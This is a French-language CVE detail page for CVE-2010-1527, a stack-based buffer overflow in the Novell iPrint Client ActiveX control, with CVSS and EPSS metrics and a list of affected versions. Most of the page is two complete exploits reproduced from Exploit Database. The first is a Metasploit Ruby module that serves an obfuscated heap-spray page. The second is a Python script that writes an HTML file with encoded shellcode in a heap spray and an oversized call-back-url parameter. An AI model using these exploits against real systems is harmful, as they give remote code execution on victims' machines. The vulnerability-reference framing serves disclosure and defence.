CVE-2010-1527 : Détail

CVE-2010-1527

Overflow
93.71%V3
Network
2010-08-23
18h00 +00:00
2017-09-18
10h57 +00:00
Notifications pour un CVE
Restez informé de toutes modifications pour un CVE spécifique.
Gestion des notifications

Descriptions du CVE

Stack-based buffer overflow in Novell iPrint Client before 5.44 allows remote attackers to execute arbitrary code via a long call-back-url parameter in an op-client-interface-version action.

Informations du CVE

Faiblesses connexes

CWE-ID Nom de la faiblesse Source
CWE-119 Improper Restriction of Operations within the Bounds of a Memory Buffer
The product performs operations on a memory buffer, but it reads from or writes to a memory location outside the buffer's intended boundary. This may result in read or write operations on unexpected memory locations that could be linked to other variables, data structures, or internal program data.

Métriques

Métriques Score Gravité CVSS Vecteur Source
V2 9.3 AV:N/AC:M/Au:N/C:C/I:C/A:C nvd@nist.gov

EPSS

EPSS est un modèle de notation qui prédit la probabilité qu'une vulnérabilité soit exploitée.

Score EPSS

Le modèle EPSS produit un score de probabilité compris entre 0 et 1 (0 et 100 %). Plus la note est élevée, plus la probabilité qu'une vulnérabilité soit exploitée est grande.

Percentile EPSS

Le percentile est utilisé pour classer les CVE en fonction de leur score EPSS. Par exemple, une CVE dans le 95e percentile selon son score EPSS est plus susceptible d'être exploitée que 95 % des autres CVE. Ainsi, le percentile sert à comparer le score EPSS d'une CVE par rapport à d'autres CVE.

Informations sur l'Exploit

Exploit Database EDB-ID : 15072

Date de publication : 2010-09-20 22h00 +00:00
Auteur : Trancer
EDB Vérifié : Yes

## # $Id: novelliprint_callbackurl.rb 10429 2010-09-21 18:46:29Z jduck $ ## ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## ## # novelliprint_callbackurl.rb # # Novell iPrint Client ActiveX Control call-back-url Buffer Overflow exploit for the Metasploit Framework # # Exploit successfully tested on the following platforms: # - Novell iPrint Client 5.40 on Internet Explorer 7, Windows XP SP3 # - Novell iPrint Client 5.42 on Internet Explorer 7, Windows XP SP3 # - Novell iPrint Client 5.42 on Internet Explorer 7, Windows Vista SP2 # # ienipp.ocx version tested: # File Version: 5.4.0.0 and 5.4.2.0 # ClassID: 36723F97-7AA0-11D4-8919-FF2D71D0D32C # RegKey Safe for Script: True # RegKey Safe for Init: True # KillBitSet: False # # References: # - CVE-2010-1527 # - OSVDB 67411 # - http://secunia.com/secunia_research/2010-104/ - Original advisory by Carsten Eiram, Secunia Research # - http://www.exploit-db.com/exploits/15042/ - MOAUB #19 exploit # - http://www.exploit-db.com/moaub-19-novell-iprint-client-browser-plugin-call-back-url-stack-overflow/ - MOAUB #14 binary analysis # - http://www.rec-sec.com/2010/09/21/novell-iprint-callbackurl-buffer-overflow-exploit/ - Metasploit exploit by Trancer, Recognize-Security # # Trancer # http://www.rec-sec.com ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML def initialize(info = {}) super(update_info(info, 'Name' => 'Novell iPrint Client ActiveX Control call-back-url Buffer Overflow', 'Description' => %q{ This module exploits a stack-based buffer overflow in Novell iPrint Client 5.42. When sending an overly long string to the 'call-back-url' parameter in an op-client-interface-version action of ienipp.ocx an attacker may be able to execute arbitrary code. }, 'License' => MSF_LICENSE, 'Author' => [ 'Trancer <mtrancer[at]gmail.com' ], 'Version' => '$Revision: 10429 $', 'References' => [ [ 'CVE', '2010-1527' ], [ 'OSVDB', '67411'], [ 'URL', 'http://secunia.com/secunia_research/2010-104/' ], # Carsten Eiram, Secunia Research [ 'URL', 'http://www.exploit-db.com/exploits/15042/' ], # MOAUB #19 ], 'DefaultOptions' => { 'EXITFUNC' => 'process', }, 'Payload' => { 'Space' => 1024, 'BadChars' => "\x00", }, 'Platform' => 'win', 'Targets' => [ [ 'Windows XP SP0-SP2 / Windows Vista / IE 6.0 SP0-SP2 / IE 7', { 'Ret' => 0x0A0A0A0A } ] ], 'DisclosureDate' => 'Aug 20 2010', 'DefaultTarget' => 0)) end def autofilter false end def check_dependencies use_zlib end def on_request_uri(cli, request) # Re-generate the payload. return if ((p = regenerate_payload(cli)) == nil) # Encode the shellcode. shellcode = Rex::Text.to_unescape(payload.encoded, Rex::Arch.endian(target.arch)) # Setup exploit buffers nops = Rex::Text.to_unescape([target.ret].pack('V')) ret = [target.ret].pack('V') ret = ret * 250 blocksize = 0x40000 fillto = 500 offset = target['Offset'] # ActiveX parameters clsid = "36723F97-7AA0-11D4-8919-FF2D71D0D32C" # Randomize the javascript variable names ienipp = rand_text_alpha(rand(100) + 1) j_shellcode = rand_text_alpha(rand(100) + 1) j_nops = rand_text_alpha(rand(100) + 1) j_ret = rand_text_alpha(rand(100) + 1) j_headersize = rand_text_alpha(rand(100) + 1) j_slackspace = rand_text_alpha(rand(100) + 1) j_fillblock = rand_text_alpha(rand(100) + 1) j_block = rand_text_alpha(rand(100) + 1) j_memory = rand_text_alpha(rand(100) + 1) j_counter = rand_text_alpha(rand(30) + 2) html = %Q|<html> <script> var #{j_shellcode} = unescape('#{shellcode}'); var #{j_nops} = unescape('#{nops}'); var #{j_headersize} = 20; var #{j_slackspace} = #{j_headersize} + #{j_shellcode}.length; while (#{j_nops}.length < #{j_slackspace}) #{j_nops} += #{j_nops}; var #{j_fillblock} = #{j_nops}.substring(0,#{j_slackspace}); var #{j_block} = #{j_nops}.substring(0,#{j_nops}.length - #{j_slackspace}); while (#{j_block}.length + #{j_slackspace} < #{blocksize}) #{j_block} = #{j_block} + #{j_block} + #{j_fillblock}; var #{j_memory} = new Array(); for (#{j_counter} = 0; #{j_counter} < #{fillto}; #{j_counter}++) { #{j_memory}[#{j_counter}] = #{j_block} + #{j_shellcode}; } </script> <object classid='clsid:#{clsid}' id='#{ienipp}'> <param name='operation' value='op-client-interface-version' /> <param name='result-type' value='url' /> <param name='call-back-url' value='#{ret}' /> </object> </html>| print_status("Sending exploit to #{cli.peerhost}:#{cli.peerport}...") # Transmit the response to the client send_response(cli, html, { 'Content-Type' => 'text/html' }) # Handle the payload handler(cli) end end
Exploit Database EDB-ID : 15042

Date de publication : 2010-09-18 22h00 +00:00
Auteur : Abysssec
EDB Vérifié : Yes

''' __ __ ____ _ _ ____ | \/ |/ __ \ /\ | | | | _ \ | \ / | | | | / \ | | | | |_) | | |\/| | | | |/ /\ \| | | | _ < | | | | |__| / ____ \ |__| | |_) | |_| |_|\____/_/ \_\____/|____/ Title : Novell iPrint Client Browser Plugin call-back-url stack overflow Version : iPrint Client plugin v5.42 (XP SP3) Analysis : http://www.abysssec.com Vendor : http://www.novell.com Impact : Critical Contact : shahin [at] abysssec.com , info [at] abysssec.com Twitter : @abysssec CVE : CVE-2010-1527 http://www.exploit-db.com/moaub-19-novell-iprint-client-browser-plugin-call-back-url-stack-overflow/ ''' import sys; #calc.exe shellcode temp = """<script> shellcode = unescape('%uc931%ue983%ud9de%ud9ee%u2474%u5bf4%u7381%u3d13%u5e46%u8395'+ '%ufceb%uf4e2%uaec1%u951a%u463d%ud0d5%ucd01%u9022%u4745%u1eb1'+ '%u5e72%ucad5%u471d%udcb5%u72b6%u94d5%u77d3%u0c9e%uc291%ue19e'+ '%u873a%u9894%u843c%u61b5%u1206%u917a%ua348%ucad5%u4719%uf3b5'+ '%u4ab6%u1e15%u5a62%u7e5f%u5ab6%u94d5%ucfd6%ub102%u8539%u556f'+ '%ucd59%ua51e%u86b8%u9926%u06b6%u1e52%u5a4d%u1ef3%u4e55%u9cb5'+ '%uc6b6%u95ee%u463d%ufdd5%u1901%u636f%u105d%u6dd7%u86be%uc525'+ '%u3855%u7786%u2e4e%u6bc6%u48b7%u6a09%u25da%uf93f%u465e%u955e'); nops=unescape('%u9090%u9090'); headersize =20; slackspace= headersize + shellcode.length; while(nops.length< slackspace) nops+= nops; fillblock= nops.substring(0, slackspace); block= nops.substring(0, nops.length- slackspace); while( block.length+ slackspace<0x50000) block= block+ block+ fillblock; memory=new Array(); for( counter=0; counter<200; counter++) memory[counter]= block + shellcode; </script> <object ID='target' classid='clsid:36723f97-7aa0-11d4-8919-ff2d71d0d32c'> <param name='operation' value='op-client-interface-version' /> <param name='result-type' value='url' /> <param name='call-back-url' value=' """ i=0 while(i<1000): temp = temp + "\x0a"; i=i+1 temp = temp + """' /> </object> """ htmlFile = open("call-back-url.html","w") htmlFile.write(temp) htmlFile.close()

Products Mentioned

Configuraton 0

Novell>>Iprint >> Version To (including) 5.42

Novell>>Iprint >> Version 4.26

Novell>>Iprint >> Version 4.27

Novell>>Iprint >> Version 4.28

Novell>>Iprint >> Version 4.30

Novell>>Iprint >> Version 4.32

Novell>>Iprint >> Version 4.34

Novell>>Iprint >> Version 4.36

Novell>>Iprint >> Version 4.38

Novell>>Iprint >> Version 5.04

Novell>>Iprint >> Version 5.12

Novell>>Iprint >> Version 5.20b

Novell>>Iprint >> Version 5.30

Novell>>Iprint >> Version 5.32

Novell>>Iprint >> Version 5.40

Références

http://www.securityfocus.com/bid/42576
Tags : vdb-entry, x_refsource_BID
http://secunia.com/advisories/40805
Tags : third-party-advisory, x_refsource_SECUNIA